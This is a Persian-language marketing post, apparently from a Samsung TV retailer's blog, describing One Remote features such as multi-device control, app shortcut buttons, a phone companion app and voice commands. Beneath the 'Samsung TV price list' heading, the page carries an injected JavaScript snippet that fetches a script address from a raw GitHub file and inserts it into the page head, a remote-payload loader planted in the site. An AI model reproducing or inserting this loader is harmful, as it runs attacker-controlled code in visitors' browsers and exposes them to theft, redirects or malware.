دسته‌بندی نشده

ویژگی های One Remote سامسونگ

One Remote هر آنچه نیاز دارید

ریموت کنترل هوشمند سامسونگ پس از تشخیص دستگاه های مختلف توسط تلویزیون, کنترل و انجام تنظیمات مختلف ان ها را انجام می دهد. با این ویژگی می توانید بدون نیاز به ریموت کنترل مخصوص دستگاه ها, تنها با ریموت تلویزیون همگی ان ها را کنترل کنید. کنسول های بازی، ساندبار ها و سایر سیستم ها با One Remote به اسانی کنترل می شوند.

دسترسی به ا‌پلیکیشن ها با یک دکمه

بر روی این ریموت کنترل برای دسترسی سریع به برنامه های مختلفی که محتوا ارائه می دهند به حالتی میانبر دکمه هایی تعبیه شده است. برنامه هایی مانند نتفلیکس و Prime Video بر روی این ریموت کنترل دکمه های اختصاصی دارند و دسترسی به ان ها به سادگی و تنها با زدن دکمه ان ها امکان پذیر است. با این قابلیت به سادگی به دنیایی از سرگرمی ها وارد خواهید شد.

استفاده از گوشی بجای ریموت

با دانلود برنامه one remote بر روی گوشی های هوشمند تمامی تنظیمات تلویزیون بر روی گوشی بجای ریموت انجام می شود. با این ویژگی گوشی هوشمند مانند یک ریموت کنترل عمل می کند و کنترل و تنظیمات مختلفی مانند کم و زیاد کردن صدا، عوض کردن اپلیکیشن ها، انجام تنظیمات، دانلود برنامه ها و سایر قابلیت ها را در اختیارتان قرار می دهد.

انجام دستورات صوتی

در ریموت کنترل هوشمند سامسونگ یک میکروفون توکار تعبیه شده است که برای انجام دستوررات صوتی و کنترل تلویزیون با صدا مورد استفاده قرار می گیرد. این ویژگی جذاب ترین و بهترین قابلیت می باشد که کنترل اسان و بی دردسر تلویزیون را برای کاربران فراهم می اورد. با این قابلیت می تواند با گفتگو و بیان خواسته خود در میکروفون, اپلیکیشن های مختلف را باز و بسته کنید، صدا تلویزیون را تنظیم کنید، محتویاتی را که می خواهید جستجو و یا دانلود کنید و به طور خلاصه با ساده ترین روش نیاز خود را از تلویزیون براورده کنید.

لیست قیمت تلویزیون های سامسونگ

(var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *